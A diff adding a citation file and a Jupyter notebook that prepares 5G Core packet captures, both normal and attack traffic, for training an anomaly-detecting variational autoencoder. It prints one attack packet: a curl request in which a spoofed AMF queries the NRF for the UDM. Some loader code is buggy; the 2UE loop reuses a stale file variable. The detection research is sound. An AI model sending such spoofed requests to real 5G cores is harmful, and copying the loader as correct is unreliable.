    CITATION.cff
     1 +cff-version: 1.2.0
     2 +message: "If you use this dataset, please cite it as below."
     3 +authors:
     4 +- family-names: "Coldwell"
     5 + given-names: "Cooper"
     6 + orcid: https://orcid.org/0000-0002-6376-8047
     7 +- family-names: "Conger"
     8 + given-names: "Denver"
     9 +- family-names: "Goodell"
     10 + given-names: "Edward"
     11 +- family-names: "Jacobson"
     12 + given-names: "Brendan"
     13 +- family-names: "Petersen"
     14 + given-names: "Bryton"
     15 + orcid: https://orcid.org/0000-0002-2242-108X
     16 +- family-names: "Spencer"
     17 + given-names: "Damon"
     18 +- family-names: "Anderson"
     19 + given-names: "Matthew"
     20 +- family-names: "Sgambati"
     21 + given-names: "Matthew"
     22 +title: "5GAD-2022"
     23 +version: 1.0.0
     24 +doi:
     25 +date-released:
     26 +url: "https://github.com/idaholab/"
     27 +type: dataset
    Data_prep.ipynb
     1 +{
     2 + "cells": [
     3 + {
     4 + "cell_type": "markdown",
     5 + "metadata": {},
     6 + "source": [
     7 + " \n",
     8 + "***\n",
     9 + "***\n",
     10 + "# Written by Cooper Coldwell, June 23 2022\n",
     11 + "This code's purpose is to read in '.pcapng' files from 3 sources--Normal-1UE, Normal-2UE, and Attacks--and parse the data to use for machine learning model training. \n",
     12 + "## Dataset Explanation\n",
     13 + "### Normal-1UE\n",
     14 + "The Normal-1UE sets represent normal 5G network traffic data collected on a simulated 5G Core connected to another computer simulating a Radio-Area-Network connected to a single User Equipment (UE, basically a 5G-capable device like a cellphone). Within the Normal-1UE directory are log files--containing the terminal logs for each Network Function (NF, the components of the 5G network)--and '.pcapng' files containing the captured 5G network packets. \n",
     15 + "The network traffic consisted of YouTube streaming, HTTP requests to popular websites, and data transfers to and from FTP and SAMBA servers.\n",
     16 + "### Normal-2UE\n",
     17 + "The Normal-2UE captured data is very similar to the Normal-1UE data except with two simulated UEs. The network traffic was of the same type but divided between the two UEs. The goal here was to introduce more 'network regulation'-type data that was very weakly represented in the 1UE. Consider the following scenario:\n",
     18 + "> A physical 5G network: a user with a 5G cellphone is moving, so the connection strength between the user and cell tower A weakens while connection strength to tower B is increasing. The network would detect this and make decisions whether to end the user's session with A and begin another with B. \n",
     19 + "\n",
     20 + "With two UEs, we hope to see more of these types of intra-network communication packets.\n",
     21 + "### Attacks\n",
     22 + "The Attacks captured data were captured by executing 5G-specific attacks against the 5G Core from the 5G Core, i.e. a Bad Actor has gained access to the Core and is mucking around. There is very little internet traffic in this set because the attacks were run while the simulated UEs were idle. There might be some incidental traffic, but not much.\n",
     23 + "## Data Handling\n",
     24 + "The data is saved across many files. For the normal data, we are pulling the data from the 'allcap\\*.pcapng' files, which contains the combined data from all the network interfaces we recorded on; the allcap files represent the sum total of all the traffic inside the 5G Core as well as the data between the RAN and Core.\n",
     25 + "When examining the captured packets with Wireshark and Scapy, we discovered that the packet layers containing the attacks were labelled as 'Raw' by Scapy, so we decided to discard the other layers. To convert the packets to a format usable for training ML models, this notebook performs the following:\n",
     26 + "1. Read in the files with Scapy\n",
     27 + "2. Convert the raw bytes for each to a string\n",
     28 + "3. Add each successive packet to an array containing the other packets of the same classification (Normal-1UE, Normal-2UE, Attack)\n",
     29 + "4. Combine subsets of the processed sets together to create a set containing normal data of both varieties and another set that is 50% attack, 50% normal. The packets in the mixed normal-and-attacks set are labelled according to whether they are normal or attack.\n",
     30 + " - These labels are not important for our training, because we use unsupervised learning to train a variational autoencoder on the normal data, but the labelled data is useful for comparing how well the VAE can differentiate between attacks and normal traffic.\n",
     31 + "5. Shuffle each set, then normalize the length of each string of bytes\n",
     32 + "6. Convert the strings of bytes to an array of bytes\n",
     33 + "7. Save the datasets"
     34 + ]
     35 + },
     36 + {
     37 + "cell_type": "code",
     38 + "execution_count": null,
     39 + "metadata": {},
     40 + "outputs": [],
     41 + "source": [
     42 + "from __future__ import absolute_import, division, print_function, unicode_literals\n",
     43 + "\n",
     44 + "# import cupy as cp\n",
     45 + "import numpy as np\n",
     46 + "import pandas as pd\n",
     47 + "# import cudf as cd\n",
     48 + "\n",
     49 + "import os, sys\n",
     50 + "import glob as glob\n",
     51 + "import binascii\n",
     52 + "import csv\n",
     53 + "import pickle\n",
     54 + "from scapy.all import *\n",
     55 + "from pathlib import Path\n",
     56 + "from tqdm.auto import tqdm"
     57 + ]
     58 + },
     59 + {
     60 + "cell_type": "markdown",
     61 + "metadata": {},
     62 + "source": [
     63 + "### Set directory paths pointing towards the datasets\n",
     64 + "The *processedPath* variable points to where the output files will be written. The *path\\** variables point to the data sources."
     65 + ]
     66 + },
     67 + {
     68 + "cell_type": "code",
     69 + "execution_count": 2,
     70 + "metadata": {},
     71 + "outputs": [],
     72 + "source": [
     73 + "pathToNormal = 'Normal-1UE/'\n",
     74 + "pathToNormal2UE = 'Normal-2UE/'\n",
     75 + "pathToAttack = 'Attacks/'\n",
     76 + "!mkdir NEW-PREPPED-DATA_jupyter\n",
     77 + "processedPath = 'NEW-PREPPED-DATA/'"
     78 + ]
     79 + },
     80 + {
     81 + "cell_type": "markdown",
     82 + "metadata": {},
     83 + "source": [
     84 + "# Loading data from the .pcapng files"
     85 + ]
     86 + },
     87 + {
     88 + "cell_type": "markdown",
     89 + "metadata": {
     90 + "tags": []
     91 + },
     92 + "source": [
     93 + "## Let's first look at the structure of packets:"
     94 + ]
     95 + },
     96 + {
     97 + "cell_type": "code",
     98 + "execution_count": 3,
     99 + "metadata": {},
     100 + "outputs": [],
     101 + "source": [
     102 + "example = rdpcap(pathToAttack+'AMFLookingForUDM/allcap_AMFLookingForUDM_00001_20220609151247.pcapng')"
     103 + ]
     104 + },
     105 + {
     106 + "cell_type": "code",
     107 + "execution_count": 4,
     108 + "metadata": {},
     109 + "outputs": [
     110 + {
     111 + "name": "stdout",
     112 + "output_type": "stream",
     113 + "text": [
     114 + "###[ Ethernet ]### \n",
     115 + " dst = 00:00:00:00:00:00\n",
     116 + " src = 00:00:00:00:00:00\n",
     117 + " type = IPv4\n",
     118 + "###[ IP ]### \n",
     119 + " version = 4\n",
     120 + " ihl = 5\n",
     121 + " tos = 0x0\n",
     122 + " len = 197\n",
     123 + " id = 22163\n",
     124 + " flags = DF\n",
     125 + " frag = 0\n",
     126 + " ttl = 64\n",
     127 + " proto = tcp\n",
     128 + " chksum = 0xe594\n",
     129 + " src = 127.0.0.1\n",
     130 + " dst = 127.0.0.10\n",
     131 + " \\options \\\n",
     132 + "###[ TCP ]### \n",
     133 + " sport = 37364\n",
     134 + " dport = irdmi\n",
     135 + " seq = 3683835274\n",
     136 + " ack = 4293697932\n",
     137 + " dataofs = 8\n",
     138 + " reserved = 0\n",
     139 + " flags = PA\n",
     140 + " window = 512\n",
     141 + " chksum = 0xfec2\n",
     142 + " urgptr = 0\n",
     143 + " options = [('NOP', None), ('NOP', None), ('Timestamp', (3708803956, 3529532140))]\n",
     144 + "###[ Raw ]### \n",
     145 + " load = 'GET /nnrf-disc/v1/nf-instances?requester-nf-type=AMF&target-nf-type=UDM HTTP/1.1\\r\\nHost: 127.0.0.10:8000\\r\\nUser-Agent: curl/7.68.0\\r\\nAccept: */*\\r\\n\\r\\n'\n",
     146 + "\n"
     147 + ]
     148 + }
     149 + ],
     150 + "source": [
     151 + "example[6].show()"
     152 + ]
     153 + },
     154 + {
     155 + "cell_type": "markdown",
     156 + "metadata": {},
     157 + "source": [
     158 + "What ScaPy shows as 'Raw' for this packet is everything after the IP and TCP headers, which turns out to be HTTP. \n",
     159 + "\n",
     160 + "This specific packet is an attack packet that pretends to be the AMF network function asking for information about the UDM network function. The attack itself is contained in the HTTP data. All of our attacks occur in HTTP or PFCP data; luckily for us, Scapy labels those portions as 'Raw'. The IP and TCP headers aren't part of the attack, but they might tip off the model based on commonalities between the attacks, so we will strip off those layers and only keep the 'Raw' portion."
     161 + ]
     162 + },
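        + {
        + "cell_type": "code",
        + "execution_count": null,
        + "metadata": {},
        + "outputs": [],
        + "source": [
        + "# Editor's illustration (not part of the original pipeline): packet[Raw].original\n",
        + "# gives the Raw layer's bytes, i.e. everything after the TCP header in this packet.\n",
        + "example[6][Raw].original[:40]"
        + ]
        + },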
     163 + {
     164 + "cell_type": "markdown",
     165 + "metadata": {},
     166 + "source": [
     167 + "## Open the Normal-1UE data and append it all together"
     168 + ]
     169 + },
     170 + {
     171 + "cell_type": "markdown",
     172 + "metadata": {},
     173 + "source": [
     174 + "### Close any running tqdm instances\n",
     175 + "The `tqdm` library provides a handy progress bar. The below section of code is only useful if you're rerunning cells in Jupyter because Jupyter maintains variables in memory, so rerunning a cell can open new instances of `tqdm`, causing the progress bar to not update in-line."
     176 + ]
     177 + },
     178 + {
     179 + "cell_type": "code",
     180 + "execution_count": 5,
     181 + "metadata": {},
     182 + "outputs": [
     183 + {
     184 + "name": "stdout",
     185 + "output_type": "stream",
     186 + "text": [
     187 + "Made it past clearing instances\n"
     188 + ]
     189 + }
     190 + ],
     191 + "source": [
     192 + "while len(tqdm._instances) > 0:\n",
     193 + " tqdm._instances.pop().close()\n",
     194 + "print(\"Made it past clearing instances\")"
     195 + ]
     196 + },
     197 + {
     198 + "cell_type": "markdown",
     199 + "metadata": {},
     200 + "source": [
     201 + "The Normal-1UE data is spread across several 'allcap*' files, so we need to iterate through the files, process them with Scapy, and combine the data into one array.\n",
     202 + "- we gather a list of .pcapng files (in the Normal-1UE directory) starting with 'allcap' using the `glob` function\n",
     203 + "- the `sniff` function is a Scapy method for reading capture files. Another possible method to use is `rdpcap`, but I found sniff to be faster for large sets.\n",
     204 + "- The Raw data output by Scapy is ugly, and not especially useful in its initial form. It will look like individual bytes represented in hexadecimal and separated by '\\'\n",
     205 + " - To remedy this, we use `binascii.hexlify`, which converts converts each byte of the binary output of sniff() to its 2-digit hex representation, which is output as a string.\n",
     206 + " \n",
     207 + "**NOTE: Reading in these pcapng files is not a quick process, so expect this section to take 10+ minutes with a decently fast CPU**"
     208 + ]
     209 + },
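        + {
        + "cell_type": "code",
        + "execution_count": null,
        + "metadata": {},
        + "outputs": [],
        + "source": [
        + "# Editor's sketch of the hexlify step on a literal byte string:\n",
        + "# each input byte becomes its 2-digit hex representation.\n",
        + "binascii.hexlify(b'\\x45\\x00\\x00\\xb8')  # -> b'450000b8'"
        + ]
        + },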
     210 + {
     211 + "cell_type": "code",
     212 + "execution_count": 6,
     213 + "metadata": {},
     214 + "outputs": [
     215 + {
     216 + "name": "stdout",
     217 + "output_type": "stream",
     218 + "text": [
     219 + "['Normal-1UE/allcap_00006_20220607091008.pcapng', 'Normal-1UE/allcap_00003_20220606211007.pcapng', 'Normal-1UE/allcap_00001_20220606131007.pcapng', 'Normal-1UE/allcap_00002_20220606171007.pcapng', 'Normal-1UE/allcap_00005_20220607051008.pcapng', 'Normal-1UE/allcap_00001_20220606102554.pcapng', 'Normal-1UE/allcap_00004_20220607011007.pcapng']\n"
     220 + ]
     221 + },
     222 + {
     223 + "data": {
     224 + "application/vnd.jupyter.widget-view+json": {
     225 + "model_id": "9b42ff90fb78456aa8f088f14565e2f8",
     226 + "version_major": 2,
     227 + "version_minor": 0
     228 + },
     229 + "text/plain": [
     230 + " 0%| | 0/7 [00:00<?, ?it/s]"
     231 + ]
     232 + },
     233 + "metadata": {},
     234 + "output_type": "display_data"
     235 + },
     236 + {
     237 + "name": "stdout",
     238 + "output_type": "stream",
     239 + "text": [
     240 + "9339618\n"
     241 + ]
     242 + }
     243 + ],
     244 + "source": [
     245 + "datasets = glob(pathToNormal+'allcap*.pcapng')\n",
     246 + "print(datasets)\n",
     247 + "payloads = []\n",
     248 + "for file in tqdm(datasets):\n",
     249 + " pcap = sniff(offline=str(file))\n",
     250 + " for packet in pcap:\n",
     251 + " if not Raw in packet:\n",
     252 + " continue\n",
     253 + " payload = binascii.hexlify(packet[Raw].original)\n",
     254 + " payloads.append(payload)\n",
     255 + "print(len(payloads))"
     256 + ]
     257 + },
     258 + {
     259 + "cell_type": "markdown",
     260 + "metadata": {},
     261 + "source": [
     262 + "### Add labels to the data and save it as a CSV\n",
     263 + "We take the payloads pulled from the pcap files and put them into a `pandas` DataFrame. The DataFrame is convenient for both shuffling the data (done with `.sample(frac=1)`) and writing it to a CSV. Before we write the payloads to a CSV, we add a \"label\" column filled with 'normal' to simplify creating a mixed set later. The CSV makes the payloads human-readable in a way that a pickled or numpy-saved file would not be. "
     264 + ]
     265 + },
     266 + {
     267 + "cell_type": "code",
     268 + "execution_count": 7,
     269 + "metadata": {},
     270 + "outputs": [
     271 + {
     272 + "name": "stdout",
     273 + "output_type": "stream",
     274 + "text": [
     275 + " raw label\n",
     276 + "0 b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b... normal\n",
     277 + "1 b'5445177f2e2747f98c8e1bbf79528d030a242a515814... normal\n",
     278 + "2 b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5... normal\n",
     279 + "3 b'34ff00c0000000010000008501000900456000b80000... normal\n",
     280 + "4 b'0a061f1bbb205a0a14a33dc41faa033103ab6cf44fc6... normal\n"
     281 + ]
     282 + }
     283 + ],
     284 + "source": [
     285 + "data = {'raw':payloads}\n",
     286 + "df = pd.DataFrame(data=data).sample(frac=1).reset_index(drop=True)\n",
     287 + "df.loc[:,'label'] = 'normal'\n",
     288 + "df.to_csv(f\"{processedPath}normal_data.csv\", index=False)\n",
     289 + "print(df.head(5))"
     290 + ]
     291 + },
     292 + {
     293 + "cell_type": "markdown",
     294 + "metadata": {},
     295 + "source": [
     296 + "## Open the 2UE normal data and append it together\n",
     297 + "The process used to handle the Normal-1UE data applies here as well, with a notable exception: speed. \n",
     298 + "**Reading in the 2UE files is MUCH slower than the 1UE files because 2UE has 23M packets vs. 1UE's 9M.**"
     299 + ]
     300 + },
     301 + {
     302 + "cell_type": "code",
     303 + "execution_count": 8,
     304 + "metadata": {},
     305 + "outputs": [
     306 + {
     307 + "name": "stdout",
     308 + "output_type": "stream",
     309 + "text": [
     310 + "Made it past clearing instances\n",
     311 + "24851445\n"
     312 + ]
     313 + }
     314 + ],
     315 + "source": [
     316 + "# Close tqdm instances:\n",
     317 + "while len(tqdm._instances) > 0:\n",
     318 + " tqdm._instances.pop().close()\n",
     319 + "print(\"Made it past clearing instances\")\n",
     320 + "\n",
     321 + "datasets = glob(pathToNormal2UE+'allcap*.pcapng')\n",
     322 + "payloads = []\n",
     323 + "for pcap in datasets:\n",
     324 + " pcap = sniff(offline=str(file))\n",
     325 + " for packet in pcap:\n",
     326 + " if not Raw in packet:\n",
     327 + " continue\n",
     328 + " payload = binascii.hexlify(packet[Raw].original)\n",
     329 + " payloads.append(payload)\n",
     330 + "print(len(payloads))"
     331 + ]
     332 + },
     333 + {
     334 + "cell_type": "markdown",
     335 + "metadata": {},
     336 + "source": [
     337 + "The 2UE data is ***massive***, so it's important to save at this point to avoid accidental loss. We experienced memory overloads, which crashed the program while trying to save to either a .npy or CSV (though, when the crashes occured, we were running the notebook cells out of order. YMMV). I discovered that saving as a pickle file used up less memory and helped to avoid crashes. *You don't want to crash before saving and have to rerun the 2 hour processing time.*"
     338 + ]
     339 + },
     340 + {
     341 + "cell_type": "code",
     342 + "execution_count": 9,
     343 + "metadata": {},
     344 + "outputs": [],
     345 + "source": [
     346 + "with open('2ue.p','wb') as file:\n",
     347 + " pickle.dump(payloads,file)"
     348 + ]
     349 + },
     350 + {
     351 + "cell_type": "code",
     352 + "execution_count": 10,
     353 + "metadata": {},
     354 + "outputs": [],
     355 + "source": [
     356 + "with open('2ue.p','rb') as file:\n",
     357 + " payloads = pickle.load(file)"
     358 + ]
     359 + },
     360 + {
     361 + "cell_type": "code",
     362 + "execution_count": 11,
     363 + "metadata": {},
     364 + "outputs": [],
     365 + "source": [
     366 + "data = {'raw':payloads,'label':['normal']*len(payloads)}\n",
     367 + "# print(data['label'][0])\n",
     368 + "df = pd.DataFrame(data=data).sample(frac=1).reset_index(drop=True)\n",
     369 + "df.to_csv(f\"{processedPath}normal_data_2ue.csv\", index=False)"
     370 + ]
     371 + },
     372 + {
     373 + "cell_type": "markdown",
     374 + "metadata": {
     375 + "tags": []
     376 + },
     377 + "source": [
     378 + "## Open the malicious data and append it all together\n",
     379 + "The total data collected while running the attacks is much smaller than the collected normal datas. The size of the isolated attack data is even smaller because we used Wireshark to filter out and export the packets performing the attacks. The filtered pcap files are labelled beginning with \"Attacks_\". \n",
     380 + "Also of note is that each attack is within its own subdirectory of the Attacks directory. The folders are named for the attack type, and each pcap file is also named for the attack type."
     381 + ]
     382 + },
     383 + {
     384 + "cell_type": "markdown",
     385 + "metadata": {},
     386 + "source": [
     387 + "<!-- one packet attack, contents of packet trigger attack\n",
     388 + "run multiple times in capture\n",
     389 + "rest of packet is normal traffic -->"
     390 + ]
     391 + },
     392 + {
     393 + "cell_type": "code",
     394 + "execution_count": 3,
     395 + "metadata": {},
     396 + "outputs": [
     397 + {
     398 + "name": "stdout",
     399 + "output_type": "stream",
     400 + "text": [
     401 + "Failed to find 'Attacks*.pcapng' file in folder: Attacks/.ipynb_checkpoints\n",
     402 + "24174\n"
     403 + ]
     404 + }
     405 + ],
     406 + "source": [
     407 + "## Remove previously-used variables from memory if they exist. This helps to reduce memory usage, and perhaps equally as important, prevent variables remaining in memory from causing unintended behavior.\n",
     408 + "## This step isn't important if the notebook is run sequentially, but in our workflow, we would re-run certain sections as needed.\n",
     409 + "try:\n",
     410 + " del dataset, payload, payloads, data, df\n",
     411 + "except:\n",
     412 + " pass\n",
     413 + "\n",
     414 + "sets = []\n",
     415 + "# print(os.listdir(pathToAttack))\n",
     416 + "for i in os.listdir(pathToAttack):\n",
     417 + " dataset = glob(pathToAttack+i+'/Attacks*.pcapng')\n",
     418 + " try:\n",
     419 + " # print(dataset[0])\n",
     420 + " sets.append(str(dataset[0]))\n",
     421 + " except:\n",
     422 + " print(\"Failed to find 'Attacks*.pcapng' file in folder: \", str(pathToAttack+i))\n",
     423 + " \n",
     424 + "# print(sets)\n",
     425 + "payloads = []\n",
     426 + "for file in sets:\n",
     427 + " pcap = sniff(offline=str(file))\n",
     428 + " \n",
     429 + " for packet in pcap[Raw]:\n",
     430 + " if not Raw in packet:\n",
     431 + " continue\n",
     432 + " payload = binascii.hexlify(packet[Raw].original)\n",
     433 + " payloads.append(payload)\n",
     434 + " # print(file,len(payloads)\n",
     435 + "print(len(payloads))"
     436 + ]
     437 + },
     438 + {
     439 + "cell_type": "code",
     440 + "execution_count": 4,
     441 + "metadata": {},
     442 + "outputs": [],
     443 + "source": [
     444 + "data = {'raw':payloads}\n",
     445 + "df = pd.DataFrame(data=data)\n",
     446 + "df.loc[:,'label'] = 'attack'\n",
     447 + "df.to_csv(f\"{processedPath}malicious_data.csv\", index=False)\n",
     448 + "\n",
     449 + "try:\n",
     450 + " del dataset, payload, payloads, data, df\n",
     451 + "except:\n",
     452 + " pass"
     453 + ]
     454 + },
     455 + {
     456 + "cell_type": "markdown",
     457 + "metadata": {},
     458 + "source": [
     459 + "## Import the data from the CSVs\n",
     460 + "Using cuDF and cuPy should increase the processing speed (by orders of magnitude) over using pandas and numpy because these new libraries use Nvidia CUDA cores for the processing. The documentation says cuDF and cuPy should implement most methods from pandas and numpy, but I had difficulty using the CUDA accelerated libraries by importing them under the same alias as pandas and numpy. \n",
     461 + "\n",
     462 + "The issue I encounter was cuDF and cuPY expecting *very specific* data-types as function parameters, which I unsuccessfully tried to provide. You, the reader, may be able to figure it out if it piques your interest.\n",
     463 + "\n",
     464 + "Back to pandas and numpy... \n",
     465 + "### Importing CSVs..."
     466 + ]
     467 + },
     468 + {
     469 + "cell_type": "code",
     470 + "execution_count": 5,
     471 + "metadata": {},
     472 + "outputs": [],
     473 + "source": [
     474 + "# import cudf as pd\n",
     475 + "# import cupy as np"
     476 + ]
     477 + },
     478 + {
     479 + "cell_type": "code",
     480 + "execution_count": 6,
     481 + "metadata": {},
     482 + "outputs": [],
     483 + "source": [
     484 + "normal = pd.read_csv(f\"{processedPath}normal_data.csv\")\n",
     485 + "normal2UE = pd.read_csv(f\"{processedPath}normal_data_2ue.csv\")\n",
     486 + "malicious = pd.read_csv(f\"{processedPath}malicious_data.csv\")"
     487 + ]
     488 + },
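        + {
        + "cell_type": "code",
        + "execution_count": null,
        + "metadata": {},
        + "outputs": [],
        + "source": [
        + "# Editor's note: to_csv wrote the Python repr of each byte string (e.g. b'4500...'),\n",
        + "# so read_csv returns str values that still include the b'...' wrapper;\n",
        + "# ReshapePackets below strips it by splitting on the quote characters.\n",
        + "print(type(normal['raw'][0]), normal['raw'][0][:12])"
        + ]
        + },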
     489 + {
     490 + "cell_type": "code",
     491 + "execution_count": 7,
     492 + "metadata": {},
     493 + "outputs": [
     494 + {
     495 + "name": "stdout",
     496 + "output_type": "stream",
     497 + "text": [
     498 + "Normal: \n"
     499 + ]
     500 + },
     501 + {
     502 + "data": {
     503 + "text/html": [
     504 + "<div>\n",
     505 + "<style scoped>\n",
     506 + " .dataframe tbody tr th:only-of-type {\n",
     507 + " vertical-align: middle;\n",
     508 + " }\n",
     509 + "\n",
     510 + " .dataframe tbody tr th {\n",
     511 + " vertical-align: top;\n",
     512 + " }\n",
     513 + "\n",
     514 + " .dataframe thead th {\n",
     515 + " text-align: right;\n",
     516 + " }\n",
     517 + "</style>\n",
     518 + "<table border=\"1\" class=\"dataframe\">\n",
     519 + " <thead>\n",
     520 + " <tr style=\"text-align: right;\">\n",
     521 + " <th></th>\n",
     522 + " <th>raw</th>\n",
     523 + " <th>label</th>\n",
     524 + " </tr>\n",
     525 + " </thead>\n",
     526 + " <tbody>\n",
     527 + " <tr>\n",
     528 + " <th>0</th>\n",
     529 + " <td>b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b...</td>\n",
     530 + " <td>normal</td>\n",
     531 + " </tr>\n",
     532 + " <tr>\n",
     533 + " <th>1</th>\n",
     534 + " <td>b'5445177f2e2747f98c8e1bbf79528d030a242a515814...</td>\n",
     535 + " <td>normal</td>\n",
     536 + " </tr>\n",
     537 + " <tr>\n",
     538 + " <th>2</th>\n",
     539 + " <td>b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5...</td>\n",
     540 + " <td>normal</td>\n",
     541 + " </tr>\n",
     542 + " <tr>\n",
     543 + " <th>3</th>\n",
     544 + " <td>b'34ff00c0000000010000008501000900456000b80000...</td>\n",
     545 + " <td>normal</td>\n",
     546 + " </tr>\n",
     547 + " </tbody>\n",
     548 + "</table>\n",
     549 + "</div>"
     550 + ],
     551 + "text/plain": [
     552 + " raw label\n",
     553 + "0 b'5497e16da1b9130133e5e732e67c0047910ac5fcee6b... normal\n",
     554 + "1 b'5445177f2e2747f98c8e1bbf79528d030a242a515814... normal\n",
     555 + "2 b'4eccbad439a0903d62084b152dc51a3e9c21bdc05ef5... normal\n",
     556 + "3 b'34ff00c0000000010000008501000900456000b80000... normal"
     557 + ]
     558 + },
     559 + "execution_count": 7,
     560 + "metadata": {},
     561 + "output_type": "execute_result"
     562 + }
     563 + ],
     564 + "source": [
     565 + "print('Normal: ')\n",
     566 + "normal.head(4)"
     567 + ]
     568 + },
     569 + {
     570 + "cell_type": "code",
     571 + "execution_count": 8,
     572 + "metadata": {},
     573 + "outputs": [
     574 + {
     575 + "name": "stdout",
     576 + "output_type": "stream",
     577 + "text": [
     578 + "Normal-2UE: \n"
     579 + ]
     580 + },
     581 + {
     582 + "data": {
     583 + "text/html": [
     584 + "<div>\n",
     585 + "<style scoped>\n",
     586 + " .dataframe tbody tr th:only-of-type {\n",
     587 + " vertical-align: middle;\n",
     588 + " }\n",
     589 + "\n",
     590 + " .dataframe tbody tr th {\n",
     591 + " vertical-align: top;\n",
     592 + " }\n",
     593 + "\n",
     594 + " .dataframe thead th {\n",
     595 + " text-align: right;\n",
     596 + " }\n",
     597 + "</style>\n",
     598 + "<table border=\"1\" class=\"dataframe\">\n",
     599 + " <thead>\n",
     600 + " <tr style=\"text-align: right;\">\n",
     601 + " <th></th>\n",
     602 + " <th>raw</th>\n",
     603 + " <th>label</th>\n",
     604 + " </tr>\n",
     605 + " </thead>\n",
     606 + " <tbody>\n",
     607 + " <tr>\n",
     608 + " <th>0</th>\n",
     609 + " <td>b'34ff027d000000010000008501100900450002750000...</td>\n",
     610 + " <td>normal</td>\n",
     611 + " </tr>\n",
     612 + " <tr>\n",
     613 + " <th>1</th>\n",
     614 + " <td>b'591d7435daee582a77fab1fbf19331c573956854543c...</td>\n",
     615 + " <td>normal</td>\n",
     616 + " </tr>\n",
     617 + " <tr>\n",
     618 + " <th>2</th>\n",
     619 + " <td>b'34ff00440000000100000085010009004580003c50dc...</td>\n",
     620 + " <td>normal</td>\n",
     621 + " </tr>\n",
     622 + " <tr>\n",
     623 + " <th>3</th>\n",
     624 + " <td>b'34ff009100000001000000850110090045000089125e...</td>\n",
     625 + " <td>normal</td>\n",
     626 + " </tr>\n",
     627 + " <tr>\n",
     628 + " <th>4</th>\n",
     629 + " <td>b'34ff0030000000010000008501100900452000280000...</td>\n",
     630 + " <td>normal</td>\n",
     631 + " </tr>\n",
     632 + " </tbody>\n",
     633 + "</table>\n",
     634 + "</div>"
     635 + ],
     636 + "text/plain": [
     637 + " raw label\n",
     638 + "0 b'34ff027d000000010000008501100900450002750000... normal\n",
     639 + "1 b'591d7435daee582a77fab1fbf19331c573956854543c... normal\n",
     640 + "2 b'34ff00440000000100000085010009004580003c50dc... normal\n",
     641 + "3 b'34ff009100000001000000850110090045000089125e... normal\n",
     642 + "4 b'34ff0030000000010000008501100900452000280000... normal"
     643 + ]
     644 + },
     645 + "execution_count": 8,
     646 + "metadata": {},
     647 + "output_type": "execute_result"
     648 + }
     649 + ],
     650 + "source": [
     651 + "print('Normal-2UE: ')\n",
     652 + "normal2UE.head()"
     653 + ]
     654 + },
     655 + {
     656 + "cell_type": "code",
     657 + "execution_count": 9,
     658 + "metadata": {},
     659 + "outputs": [
     660 + {
     661 + "name": "stdout",
     662 + "output_type": "stream",
     663 + "text": [
     664 + "Malicious: \n"
     665 + ]
     666 + },
     667 + {
     668 + "data": {
     669 + "text/html": [
     670 + "<div>\n",
     671 + "<style scoped>\n",
     672 + " .dataframe tbody tr th:only-of-type {\n",
     673 + " vertical-align: middle;\n",
     674 + " }\n",
     675 + "\n",
     676 + " .dataframe tbody tr th {\n",
     677 + " vertical-align: top;\n",
     678 + " }\n",
     679 + "\n",
     680 + " .dataframe thead th {\n",
     681 + " text-align: right;\n",
     682 + " }\n",
     683 + "</style>\n",
     684 + "<table border=\"1\" class=\"dataframe\">\n",
     685 + " <thead>\n",
     686 + " <tr style=\"text-align: right;\">\n",
     687 + " <th></th>\n",
     688 + " <th>raw</th>\n",
     689 + " <th>label</th>\n",
     690 + " </tr>\n",
     691 + " </thead>\n",
     692 + " <tbody>\n",
     693 + " <tr>\n",
     694 + " <th>0</th>\n",
     695 + " <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
     696 + " <td>attack</td>\n",
     697 + " </tr>\n",
     698 + " <tr>\n",
     699 + " <th>1</th>\n",
     700 + " <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
     701 + " <td>attack</td>\n",
     702 + " </tr>\n",
     703 + " <tr>\n",
     704 + " <th>2</th>\n",
     705 + " <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
     706 + " <td>attack</td>\n",
     707 + " </tr>\n",
     708 + " <tr>\n",
     709 + " <th>3</th>\n",
     710 + " <td>b'474554202f6e6e72662d646973632f76312f6e662d69...</td>\n",
     711 + " <td>attack</td>\n",
     712 + " </tr>\n",
     713 + " </tbody>\n",
     714 + "</table>\n",
     715 + "</div>"
     716 + ],
     717 + "text/plain": [
     718 + " raw label\n",
     719 + "0 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
     720 + "1 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
     721 + "2 b'474554202f6e6e72662d646973632f76312f6e662d69... attack\n",
     722 + "3 b'474554202f6e6e72662d646973632f76312f6e662d69... attack"
     723 + ]
     724 + },
     725 + "execution_count": 9,
     726 + "metadata": {},
     727 + "output_type": "execute_result"
     728 + }
     729 + ],
     730 + "source": [
     731 + "print('Malicious: ')\n",
     732 + "malicious.head(4)"
     733 + ]
     734 + },
     735 + {
     736 + "cell_type": "markdown",
     737 + "metadata": {},
     738 + "source": [
     739 + "## Create new sets from the old for training models\n",
     740 + "We want to have a set that is 50% attacks, 50% normal and a set of the two types of normal traffic. Let's look at the size of the sets so we can determine how best to make the 25-25-50 (1UE-2UE-Attack) dataset."
     741 + ]
     742 + },
     743 + {
     744 + "cell_type": "code",
     745 + "execution_count": 10,
     746 + "metadata": {},
     747 + "outputs": [
     748 + {
     749 + "name": "stdout",
     750 + "output_type": "stream",
     751 + "text": [
     752 + "Normal size: (9339618, 2)\n",
     753 + "Normal2UE size: (24851445, 2)\n",
     754 + "Malicious size: (24174, 2)\n"
     755 + ]
     756 + }
     757 + ],
     758 + "source": [
     759 + "print(f'Normal size: {normal.shape}')\n",
     760 + "print(f'Normal2UE size: {normal2UE.shape}')\n",
     761 + "print(f'Malicious size: {malicious.shape}')"
     762 + ]
     763 + },
     764 + {
     765 + "cell_type": "markdown",
     766 + "metadata": {},
     767 + "source": [
     768 + "### Create a mixed set of both attack and normal\n",
     769 + "We want a 50/50 split of normal/attack data, and the malicious set is significantly smaller than either of the normal sets. Therefore, we take **all** of malicious and then half as many samples each for Normal-1IU and normal2UE. To avoid some kind of data bias, normal and normal2UE are shuffled before sampling.\n",
     770 + "\n",
     771 + "Also, delete variables from memory as we go to avoid crashes."
     772 + ]
     773 + },
     774 + {
     775 + "cell_type": "code",
     776 + "execution_count": 11,
     777 + "metadata": {},
     778 + "outputs": [
     779 + {
     780 + "name": "stdout",
